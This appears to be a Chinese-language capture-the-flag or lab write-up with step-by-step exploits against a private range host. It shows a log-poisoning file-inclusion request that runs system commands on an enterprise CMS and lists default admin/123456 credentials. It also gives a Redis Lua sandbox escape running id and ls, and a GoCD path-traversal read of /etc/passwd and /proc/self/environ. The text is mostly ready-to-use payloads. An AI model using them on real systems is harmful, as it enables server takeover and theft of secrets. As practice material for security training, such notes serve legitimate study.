原因:
稻草人企业站存在文件上传漏洞,攻击者可利用漏洞获取服务器控制权。 用户名密码:admin 123456 (网站)
解决方案:
写入命令ls /tmp
GET /index.php?m=–>=system(ls%20/tmp);?> HTTP/1.1
出现报错,就写入日志
http://10.11.12.28:59934/Application/Runtime/Logs/Common/23_08_20.log
http://10.11.12.28:59934/index.php?
m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_08_20.log
或者命令行redis-cli.exe -h 10.11.12.28 -p 43510
eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“id”, “r”); local res = f:read(“*a”); f:close(); return res’ 0
eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“ls /tmp”, “r”); local res = f:read(“*a”); f:close(); return res’ 0
原因:
GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd 对文件进行读取。
漏洞是任意文件读取,靶场中flag是在tmp目录下,也没办法查看目录下的文件
/proc/self/environ是Linux系统下的环境变量文件,用于保存系统的一些变量。
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/proc/self/environ